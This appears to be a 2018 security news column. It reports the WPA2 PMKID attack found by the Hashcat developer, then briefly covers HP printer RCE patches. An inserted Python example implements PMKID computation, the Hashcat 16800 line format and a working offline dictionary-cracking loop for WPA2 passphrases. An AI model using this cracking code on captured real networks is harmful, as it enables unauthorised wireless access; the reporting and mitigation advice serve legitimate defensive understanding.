New WPA2 Attack Can Compromise Wireless Networks

Researchers have found a new and easier way of attacking wireless networks protected by the WPA2 security standard that could work against certain routers with roaming enabled.

The new technique was discovered by Jens Steube, the lead developer of the Hashcat password-cracking tool, while he was investigating the new WPA3 wireless security standard.

The attack still requires cracking the Wi-Fi passphrase, from which the pre-shared key (PSK) is derived, by guessing candidates offline against a captured value—in this case, using Hashcat. However, with Steube’s method, obtaining that value is much easier than before.

Until now, to attack WPA2-PSK networks, attackers had to wait for a client to connect to an access point (AP) and capture the four-way handshake carried in EAPOL-Key frames between them. The new attack instead targets an optional field in the RSN IE (Robust Security Network Information Element) that the AP includes in the first message of that handshake. Because the AP sends this message to any station that associates, the attacker can obtain the needed data directly from the AP, with no legitimate client present and no need to wait for a complete handshake.

That field is the PMKID: the first 128 bits of an HMAC-SHA1 computed over the fixed string “PMK Name” followed by the access point’s MAC address and the station’s MAC address, keyed with the Pairwise Master Key (PMK). On a WPA2-PSK network the PMK is the PSK itself, derived from the passphrase and the SSID, so a captured PMKID can be checked offline against passphrase guesses.

“Since the PMK is the same as in a regular EAPOL 4-way handshake this is an ideal attacking vector,” Steube said in a post on the Hashcat forums. “We receive all the data we need in the first EAPOL frame from the AP.”

Steube’s post explains how to extract the PMKID into a format that Hashcat can consume. The final step is still an offline guessing attack against the passphrase, so the PMKID only makes the capture step easier, not the cracking step; a long, random passphrase (not a dictionary word or a short pattern) remains an effective mitigation.
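As an added worked example (not code from the article, from Steube’s post or from Hashcat), the computation described above carried out in Python: the PMK is derived from a passphrase and SSID with PBKDF2-HMAC-SHA1, the PMKID is computed as HMAC-SHA1-128 over “PMK Name” and the two MAC addresses, the result is written in Hashcat’s mode 16800 line format (PMKID*MAC_AP*MAC_STA*ESSID, all in hex), and a small dictionary loop recovers the passphrase from that one line. The MAC addresses, SSID, passphrase and wordlist are constructed for the example; no network capture is involved.

```python
import hashlib
import hmac
from typing import Iterable, Optional

# All network parameters below are constructed for this example.


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA2-PSK: the PMK is the PSK, PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"), ssid.encode("utf-8"), 4096, 32)


def pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AP MAC || station MAC): the first 16 bytes of the HMAC."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def mac_to_bytes(mac: str) -> bytes:
    """Accepts aa:bb:cc:dd:ee:ff or aa-bb-cc-dd-ee-ff and returns the 6 raw bytes."""
    return bytes.fromhex(mac.replace(":", "").replace("-", ""))


def to_hashcat_16800(pmkid_bytes: bytes, ap_mac: str, sta_mac: str, ssid: str) -> str:
    """Hashcat mode 16800 line: PMKID*MAC_AP*MAC_STA*ESSID, each field as lowercase hex."""
    return "*".join([
        pmkid_bytes.hex(),
        mac_to_bytes(ap_mac).hex(),
        mac_to_bytes(sta_mac).hex(),
        ssid.encode("utf-8").hex(),
    ])


def crack_16800(line: str, wordlist: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack against one mode-16800 line; returns the passphrase or None.

    Each guess costs one PBKDF2 derivation (4096 HMAC-SHA1 rounds) plus one short HMAC,
    which is the only thing standing between a captured PMKID and a weak passphrase.
    """
    pmkid_hex, ap_hex, sta_hex, ssid_hex = line.strip().split("*")
    target = bytes.fromhex(pmkid_hex)
    ap_mac, sta_mac = bytes.fromhex(ap_hex), bytes.fromhex(sta_hex)
    ssid = bytes.fromhex(ssid_hex).decode("utf-8")
    for candidate in wordlist:
        if hmac.compare_digest(pmkid(pmk_from_passphrase(candidate, ssid), ap_mac, sta_mac), target):
            return candidate
    return None


def demo() -> Optional[str]:
    """Builds a PMKID the way an AP would (constructed values) and cracks it from the Hashcat line alone."""
    ap_mac, sta_mac, ssid, secret = "02:00:00:00:00:01", "02:00:00:00:00:02", "ExampleNet", "correct horse"
    captured = pmkid(pmk_from_passphrase(secret, ssid), mac_to_bytes(ap_mac), mac_to_bytes(sta_mac))
    line = to_hashcat_16800(captured, ap_mac, sta_mac, ssid)
    return crack_16800(line, ["password", "letmein", "12345678", "correct horse"])


if __name__ == "__main__":
    print(demo())
```

The loop in `crack_16800` is the entire attack once the first EAPOL-Key message has been captured: nothing from the client side is needed, and every guess is verified against the PMKID with the same PBKDF2 cost that a conventional four-way-handshake crack pays.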

This technique doesn’t work against WPA3, because the new standard replaces the PSK-based handshake with Simultaneous Authentication of Equals (SAE), a password-authenticated key exchange that does not hand an eavesdropper material that can be cracked offline.

Also, since the PMKID field of the RSN IE is optional, not all routers send it. In practice it’s typically found only on devices with roaming features such as PMK caching enabled.

“Will be interesting to see against how many home routers this works,” Mathy Vanhoef, the researcher who found the KRACK attack against WPA2 last year, commented on Twitter. “Currently we can only guess, but my hunch is that most don’t support roaming (yet), so are not affected.”

“Some implementations may send the PMKID even if roaming is not enabled,” Vanhoef said. “It really depends on the implementation being attacked. Doing some tests with many devices would be useful here.”

HP Patches Critical Remote Code Execution Flaws in Inkjet Printers

HP has released firmware updates for dozens of its Inkjet printer models to address two critical vulnerabilities that could allow attackers to execute malicious code on devices.

The bugs, tracked as CVE-2018-5924 and CVE-2018-5925, are stack and buffer overflow flaws rated 9.8 out of 10 on the CVSS scale. Attackers can exploit them for remote code execution by sending a maliciously crafted file to an affected device.

Vulnerable printer series include HP PageWide Pro, HP DesignJet, HP OfficeJet, HP DeskJet, HP Envy, HP Photosmart and HP Smart Tank Wireless.

Late last month, HP launched an invitation-only bug bounty program through which it rewards researchers with up to $10,000 for finding serious vulnerabilities in its business printers.

“As we navigate an increasingly complex world of cyber threats, it’s paramount that industry leaders leverage every resource possible to deliver trusted, resilient security from the firmware up,” said Shivaun Albright, HP’s Chief Technologist of Print Security, at the time. “HP is committed to engineering the most secure printers in the world.”

Lucian Constantin

Lucian has been covering computer security and the hacker culture for almost a decade, his work appearing in many technology publications including PCWorld, Computerworld, Network World, CIO, CSO, Forbes and The Inquirer. He has a bachelor's degree in political science, but has been passionate about computers and cybersecurity from an early age. Before he chose a career in journalism, Lucian worked as a system and network administrator. He enjoys attending security conferences and delving into interesting research papers. You can reach him at [email protected] or @lconstantin on Twitter. For encrypted email, his PGP key's fingerprint is: 7A66 4901 5CDA 844E 8C6D 04D5 2BB4 6332 FC52 6D42